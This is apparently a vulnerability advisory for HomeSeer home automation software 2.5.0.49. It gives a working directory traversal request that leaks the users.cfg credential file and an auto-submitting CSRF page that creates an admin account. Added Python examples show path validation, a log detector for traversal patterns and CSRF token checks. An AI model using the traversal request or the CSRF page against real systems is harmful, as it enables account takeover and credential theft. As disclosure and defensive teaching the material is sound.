HomeSeer Home Automation Software Multiple Web Vulnerabilities (0day)
Author: Silent_Dream
Download: http://www.homeseer.com/pub/setuphs2_5_0_49.exe
Affected Versions: 2.5.0.49
Test Platform: Win XP
Note: This affects both HomeSeer HS2 and HomeSeer PRO.
# The previously reported XSS attack vector (elog), reported to CERT, was fixed in the 2.5.0.49 update.
A) Directory traversal: retrieving the users.cfg file, which contains HomeSeer usernames, access levels, and encrypted passwords.
ncat 192.168.0.1 80
GET /..\Config\users.cfg HTTP/1.0
HTTP/1.0 200 OK
Server: HomeSeer
Content-Type: application/
Accept-Ranges: bytes
Content-Length: 195

2
EFBBBF6775657374, efbbbf4853454e4332774b51364d614c53436d534d41697a48617213514d513D3D, EFBBBF31
EFBBBF64656661756C74, EFBBBF4853454E43327A68336A307A412F585153776F7032575A54534E63773D3D, EFBBBF36
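The request above escapes the web root because the server treats `..\` like `../` and never checks where the resolved path lands. The following added example (not part of the advisory or of HomeSeer's code) shows the check a web server should apply before opening a requested file, plus a small detector that flags this traversal pattern in access logs. The web root `/srv/homeseer/html`, the log lines and the client addresses are constructed for the demonstration.

```python
import posixpath
import re
import urllib.parse

WEB_ROOT = "/srv/homeseer/html"  # constructed web root for the demo


def resolve_web_path(request_path: str, web_root: str = WEB_ROOT):
    """Map a raw HTTP request path onto a file under web_root.

    Returns the absolute path, or None when the request would escape the root.
    Backslashes are treated as separators because Windows servers do so, which
    is exactly what the advisory's "/..\\Config\\users.cfg" request relies on.
    """
    decoded = urllib.parse.unquote(request_path)
    if "\x00" in decoded:  # embedded NUL can truncate the path in native code
        return None
    decoded = decoded.replace("\\", "/")
    # Join first, normalise second: collapsing ".." before the join would hide
    # the escape instead of exposing it.
    root = posixpath.normpath(web_root)
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


# Common log format: client, ident, user, [timestamp], "METHOD PATH PROTO", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) (\S+)" (\d{3})')
# ".." followed by either separator, in raw or percent-encoded form
TRAVERSAL_RE = re.compile(r"\.\.[\\/]", re.IGNORECASE)


def flag_traversal_requests(log_lines):
    """Return one record per request whose path contains a traversal sequence."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _ts, method, path, _proto, status = m.groups()
        if TRAVERSAL_RE.search(urllib.parse.unquote(path)):
            hits.append({"client": client, "method": method,
                         "path": path, "status": int(status)})
    return hits


# Constructed sample log lines: one normal request, then the advisory's
# request in raw and percent-encoded form.
SAMPLE_LOG = [
    r'192.168.0.50 - - [01/Jan/2012:10:00:00 +0000] "GET /index.htm HTTP/1.0" 200 1024',
    r'192.168.0.77 - - [01/Jan/2012:10:00:01 +0000] "GET /..\Config\users.cfg HTTP/1.0" 200 195',
    r'192.168.0.77 - - [01/Jan/2012:10:00:02 +0000] "GET /%2e%2e%5cConfig%5cusers.cfg HTTP/1.0" 200 195',
]

if __name__ == "__main__":
    print(resolve_web_path("/index.htm"))            # stays inside the root
    print(resolve_web_path(r"/..\Config\users.cfg"))  # None: rejected
    for hit in flag_traversal_requests(SAMPLE_LOG):
        print(hit)
```

A status 200 with a body length matching users.cfg (195 bytes in the advisory) on a flagged line is the strongest sign that the traversal succeeded rather than merely being attempted.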
B) Cross-Site Request Forgery: it is possible to add a new admin user by tricking a logged-in admin into visiting a malicious page.
This PoC adds an administrator with the username hacker and the password hacked.
<html>
<body onload="document.forms[0].submit()">
<h2>HomeSeer CSRF Exploit to add new administrator account</h2>
<!-- the form posts to the /ctrl handler on the HomeSeer host; 192.168.0.1 is the test host used in section A -->
<form method="POST" name="form0" action="http://192.168.0.1/ctrl">
<input type="hidden" name="wuNEWUSERNAME" value="hacker"/>
<input type="hidden" name="wuNEWUSERPASS" value="hacked"/>
<input type="hidden" name="wuNEWUSERRIGHTS" value="Admin"/>
<input type="hidden" name="wuNEWUSERADD" value="Add"/>
<input type="hidden" name="stay_on_webusers" value="Hello"/>
</form>
</body>
</html>
Fix
Stricter validation of requests.
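The form in section B works because /ctrl accepts any POST that arrives with the admin's session cookie; the browser attaches the cookie to a cross-site submission automatically. The added example below (not HomeSeer code, not from the advisory) shows the two checks a state-changing handler should apply: a synchronizer token bound to the session, and an Origin/Referer check. The field names are taken from the PoC; the session id, the server secret and the host `http://192.168.0.1` (the test host from section A) are constructed for the demonstration.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

# Constructed per-install secret; a real server would generate and store its own.
SERVER_SECRET = b"constructed-demo-secret-not-for-production"
ALLOWED_ORIGIN = "http://192.168.0.1"  # the HomeSeer host from section A


def csrf_token(session_id: str, secret: bytes = SERVER_SECRET) -> str:
    """Token tied to the session: an attacker's page cannot read or compute it."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def render_add_user_form(session_id: str) -> str:
    """The legitimate web-users form carries the token as a hidden field."""
    return (
        '<form method="POST" action="/ctrl">'
        f'<input type="hidden" name="csrf_token" value="{csrf_token(session_id)}"/>'
        '<input name="wuNEWUSERNAME"/><input name="wuNEWUSERPASS" type="password"/>'
        '<input type="submit" name="wuNEWUSERADD" value="Add"/></form>'
    )


def check_ctrl_request(session_id: str, form: dict, headers: dict,
                       secret: bytes = SERVER_SECRET):
    """Decide whether a POST to /ctrl may change state.

    Returns (accepted, reason). Both checks must pass; the Origin check alone
    is bypassed when a browser sends neither header, so the token is primary.
    """
    # 1. Origin (or Referer as fallback) is set by the browser and cannot be
    #    forged by a page on another site.
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False, "missing Origin/Referer"
    parts = urlsplit(source)
    if f"{parts.scheme}://{parts.netloc}" != ALLOWED_ORIGIN:
        return False, f"cross-site request from {parts.netloc}"
    # 2. Synchronizer token; constant-time compare avoids leaking the token.
    supplied = form.get("csrf_token", "")
    if not hmac.compare_digest(supplied, csrf_token(session_id, secret)):
        return False, "missing or invalid csrf_token"
    if "wuNEWUSERADD" in form:
        return True, (f"add user {form.get('wuNEWUSERNAME')} "
                      f"with rights {form.get('wuNEWUSERRIGHTS')}")
    return True, "ok"


# Constructed session id of the logged-in admin.
ADMIN_SESSION = "sess-0123456789abcdef"

# The PoC's hidden fields, exactly as the attacker's page would submit them.
FORGED_FORM = {
    "wuNEWUSERNAME": "hacker",
    "wuNEWUSERPASS": "hacked",
    "wuNEWUSERRIGHTS": "Admin",
    "wuNEWUSERADD": "Add",
    "stay_on_webusers": "Hello",
}
FORGED_HEADERS = {"Origin": "http://attacker.example"}  # constructed

# The same fields submitted from the real form on the HomeSeer host.
LEGIT_FORM = dict(FORGED_FORM, csrf_token=csrf_token(ADMIN_SESSION))
LEGIT_HEADERS = {"Origin": ALLOWED_ORIGIN}

if __name__ == "__main__":
    print(check_ctrl_request(ADMIN_SESSION, FORGED_FORM, FORGED_HEADERS))
    print(check_ctrl_request(ADMIN_SESSION, LEGIT_FORM, LEGIT_HEADERS))
```

Note that neither check relies on the request body, so the PoC's hidden fields are irrelevant to the decision: the cross-site submission fails on origin and again on the absent token, while the same fields from the genuine form pass.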